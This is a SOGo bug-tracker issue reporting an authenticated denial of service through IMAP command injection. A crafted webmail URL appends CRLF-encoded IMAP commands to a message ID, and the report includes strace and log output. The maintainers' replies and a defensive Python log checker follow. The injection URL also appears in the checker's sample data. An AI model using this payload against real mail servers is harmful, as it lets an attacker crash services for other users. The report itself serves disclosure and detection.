View Issue Details

ID: 0002370
Project: SOGo
Category: Backend Mail
View Status: public
Last Update: 2013-09-27 14:11
Reporter: ispoljaric
Assigned To:
Priority: normal
Severity: crash
Reproducibility: always
Status: closed
Resolution: suspended
Product Version: 2.0.6
Summary: 0002370: Authenticated DOS is sogo, via imap injection (OWASP-DV-011)
Description

Sogo dies after trying to fetch a mail via webmail, using a modified URL. Sogo can't restart; it runs in a busy loop, consuming maximum resources. We had to do killall -9 sogod; /etc/init.d/sogod restart. A plain restart did nothing.

Steps To Reproduce

1) Log in
2) Paste the following URL, changing the info for your account/URL:
http://URL/SOGo/so/USERNAME/Mail//0/folderINBOX/14141%20%20BODY[HEADER]%0d%0aV100%20CAPABILITY%0d%0aV101%20FETCH%204791/view

This one works every time. I forgot to write down every combination that got a crash. There could be more problems with fetching mail.

Additional Information

After crash, we get:

Proxy Error

The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request GET /SOGo/so/ispoljaric/Mail//0/folderINBOX/14141 BODY[HEADER] V100 CAPABILITY V101 FETCH 4791/view.

Reason: Error reading from remote server

And strace gives us:
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 84) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 83) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 79) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 78) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 75) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0
poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 74) = 1 ([{fd=3, revents=POLLIN}])
wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0

And sogo.log writes these down, until it is killed and restarted:

<0xCF2162E8[SOGoMailObject]:14141 BODY[HEADER]
V100 CAPABILITY
V101 FETCH 4791> ERROR: unexpected IMAP4 result (missing 'message'): {"body[header]" = {data = <...>; }; msn = 5664; uid = 14141; }
10.0.0.225 - - [15/Jul/2013:13:58:27 GMT] "GET /SOGo/so/ispoljaric/Mail/0/folderINBOX/14141%20BODY%5BHEADER%5D%0D%0AV100%20CAPABILITY%0D%0AV101%20FETCH%204791 HTTP/1.1" 500 191/0 0.560 - - 0
Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> FAILURE receiving status for child 1813
Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> socket: <NGActiveSocket[0x0x7f17cdaab198]: mode=rw address=(null) connectedTo=<0x0x7f17cda37e68[NGLocalSocketAddress]: /tmp/_ngsocket_0x6ee_0x7f17cd7d5ff8_000> receive-timeout=1.000s>
Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> exception: <NGSocketTimedOutException: 0x7f17cdac9d78> NAME:NGSocketTimedOutException REASON:the socket was shutdown INFO:{errno = 11; error = "Resource temporarily unavailable"; stream = "{object = <NGActiveSocket[0x0x7f17cdaab198]: mode=rw address=(null) connectedTo=<0x0x7f17cda37e68[NGLocalSocketAddress]: /tmp/_ngsocket_0x6ee_0x7f17cd7d5ff8_000> receive-timeout=1.000s>;}"; }
Jul 15 13:58:34 sogod [1774]: <0x0x7f17cd9b2f58[WOWatchDogChild]> sending terminate signal to pid 1813
Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> FAILURE notifying child 1813
Jul 15 13:58:34 sogod [1774]: <0x0x7f17cd9b2f58[WOWatchDogChild]> sending terminate signal to pid 1813
Jul 15 14:12:06 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM
Jul 15 14:12:06 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM
Jul 15 14:12:07 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM
Jul 15 14:12:07 sogod [3598]: version 2.0.6b (build root@shiva.inverse 201306271214) -- starting

Tags: No tags attached.
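
Added example (not part of the original report and not SOGo code): a log check for the pattern reported above, where the message-id path segment decodes to more than a bare IMAP UID. The URL layout (`/Mail/<account>/folder<name>/<id>`) is assumed from the URLs shown in this report, and the function names are hypothetical; `is_imap_uid` is the allow-list test a server would apply before placing the value in a FETCH command.

```python
import re
from urllib.parse import unquote

# Request line of a common-log-style entry, as in the sogo.log excerpt above.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# RFC 3501: a message UID is a non-zero unsigned 32-bit number (ASCII digits only).
UID_RE = re.compile(r"[1-9][0-9]{0,9}")


def is_imap_uid(value: str) -> bool:
    """Allow-list check to apply before a value is placed in an IMAP FETCH command."""
    return UID_RE.fullmatch(value) is not None and int(value) <= 0xFFFFFFFF


def message_segment(path: str):
    """Decoded path segment after the last folder* segment under /Mail/, else None.

    Splitting happens before percent-decoding so an encoded '/' cannot move the
    segment boundary. The URL layout is an assumption taken from this report.
    """
    segments = [s for s in path.split("?", 1)[0].split("/") if s]
    if "Mail" not in segments:
        return None
    folders = [i for i, s in enumerate(segments) if s.startswith("folder")]
    if not folders or folders[-1] + 1 >= len(segments):
        return None
    return unquote(segments[folders[-1] + 1])


def classify(log_line: str) -> str:
    match = REQUEST_RE.search(log_line)
    segment = message_segment(match.group(1)) if match else None
    if segment is None:
        return "not-a-message-request"
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in segment):
        return "control-chars-in-message-id"  # CR/LF would end the IMAP command line
    return "ok" if is_imap_uid(segment) else "non-uid-segment"


# First line is the access-log entry quoted in this report; the second is constructed.
SAMPLE_LOG = [
    '10.0.0.225 - - [15/Jul/2013:13:58:27 GMT] "GET /SOGo/so/ispoljaric/Mail/0/folderINBOX/14141%20BODY%5BHEADER%5D%0D%0AV100%20CAPABILITY%0D%0AV101%20FETCH%204791 HTTP/1.1" 500 191/0 0.560 - - 0',
    '10.0.0.225 - - [15/Jul/2013:13:57:02 GMT] "GET /SOGo/so/ispoljaric/Mail/0/folderINBOX/14141/view HTTP/1.1" 200 5120/0 0.210 - - 0',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line.split('"')[1])
```

A `non-uid-segment` result is not an alert by itself, since the segment after a folder can also be an action name; only the control-character case matches what this report describes.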

Activities

ludovic

2013-07-16 15:34

administrator   ~0005751

I can't reproduce that one.

Moreover, the watchdog will kill any stuck processes and in real-world deployments, you must have more than one process to handle incoming requests.

So please, provide detailed instructions on reproducing it and we'll see if we can mitigate it.

ludovic

2013-09-27 14:11

administrator   ~0006055

No feedback provided in more than 2 months, closing.

Issue History

Date Modified | Username | Field | Change
2013-07-15 14:31 | ispoljaric | New Issue |
2013-07-16 15:34 | ludovic | Note Added: 0005751 |
2013-09-27 14:11 | ludovic | Note Added: 0006055 |
2013-09-27 14:11 | ludovic | Status | new => closed
2013-09-27 14:11 | ludovic | Resolution | open => suspended